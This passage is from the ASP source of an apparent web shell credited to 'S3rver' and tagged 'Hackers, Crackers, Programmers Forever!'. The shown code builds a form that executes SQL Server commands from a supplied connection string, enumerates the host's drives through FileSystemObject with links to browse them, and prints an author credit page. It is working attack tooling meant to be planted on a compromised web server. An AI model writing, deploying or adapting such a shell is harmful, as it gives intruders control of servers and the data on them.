1030.                     Response.Write "<form method=""post"" target=""_opener"" action=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=sqlserver"">"
1031.                     Response.Write "<table cellpadding=0 cellspacing=0 align=center><tr><td align=center><font size=2>SQL Server connection string:</td></tr><tr><td align=center>"
1032.                     Response.Write "<input type=hidden value='7' name=status>"
1033.                     Response.Write "<input style='width:250; height:21' value='' name=path><br>"
1034.                     response.Write "<input type=submit value='Execute SQL Server Command' style='height:23;width:220' id=submit1 name=submit1>"
1035.                     Response.Write "</td></tr></table>"
1036.                     response.Write "</form>"
1037.      
1038.             End IF
1039.      
1040.      
1041.      
1042.             Case "about"
1043.                     showdisks=FALSE
1044.                     checa = checking(cprthtml,keydec)
1045.                     Call hdr()
1046.                     response.Write "<br><br><br><body topmargin=5 leftmargin=0><center><h4>Coded By S3rver"
1047.                     response.Write "<br><br>"
1048.                     response.Write "<font size=2 color=Red face='courier new'>WebSite: :)</font>"
1049.                     response.Write "<br>"
1050.                     response.Write "<font size=2 color=Red face='courier new'>E-Mail: Pouya.S3rver@Gmail.Com</font>"
1051.                     response.Write "<br><br>"
1052.                     response.Write "<font size=2 color=Blue face='courier new'>Hackers, Crackers, Programmers Forever!</font>"
1053.      
1054.      
1055.             Case Else
1056.                     checa = checking(cprthtml,keydec)
1057.                     Call hdr()
1058.                     Response.Write copyright & onlinehelp
1059.                     Call showcontent()
1060.     End Select
1061.     If Err.Number <> 0 Then
1062.             Response.Write "<br><font face='arial' size='2'>ERRO: " & Err.Number & "<br><br><b>" & UCase(Err.Description) & "</b><br>Acesse denied."
1063.     End If
1064.     Response.Write endcode
1065.      
1066.     if showdisks then
1067.      
1068.     %>
1069.      
1070.             <script language=javascript>
1071.                     // DRIVE ISLEMLERI
1072.                     function driveGo(drive_){
1073.                             location = "?raiz="+drive_+":";
1074.                     }
1075.             </script>
1076.      
1077.      
1078.     <%
1079.      
1080.      
1081.             Set objFSO = Server.CreateObject("Scripting.FileSystemObject")
1082.      
1083.             Response.Write "<br><br><br><table align=center border=1 width=150 cellpadding=0 cellspacing=0><tr bgcolor=gray><td align=center><b><font color=white>Drives</td></tr>"
1084.             for each drive_ in objFSO.Drives
1085.                     Response.Write "<tr><td>"
1086.                     Response.write "<a href='#'onClick=""driveGo('" & drive_.DriveLetter & "');return false;""><font face=wingdings>;</font>"
1087.                     if drive_.Drivetype=1 then Response.write "Floppy [" & drive_.DriveLetter & ":]"
1088.                     if drive_.Drivetype=2 then Response.write "HardDisk [" & drive_.DriveLetter & ":]"
1089.                     if drive_.Drivetype=3 then Response.write "Remote HDD [" & drive_.DriveLetter & ":]"
1090.                     if drive_.Drivetype=4 then Response.write "CD-Rom [" & drive_.DriveLetter & ":]"
1091.                     Response.Write "</a></td></tr>"
1092.             next
1093.             Response.Write "<tr><td>"
1094.             Response.write "<a href='"& Request.ServerVariables("SCRIPT_NAME") & "'><font face=webdings>H</font> Local Path"
1095.             Response.Write "</a></td></tr>"
1096.             Response.Write "</table><br>"
1097.     end if
1098.     %>
1099.     <br><Center><Font Face='Wingdings' Size='7' Color = 'FFFFFF'><b> µ </b></Font></Center>
1100.     <br><Center><Font Face='Wingdings' Size='7' Color = 'FFFFFF'><b> µ </b></Font></Center>
1101.     <br><Center><Font Face='Wingdings' Size='7' Color = 'FFFFFF'><b> µ </b></Font></Center>
1102.     <br><Center><Font Face='Wingdings' Size='7' Color = 'FFFFFF'><b> µ </b></Font></Center>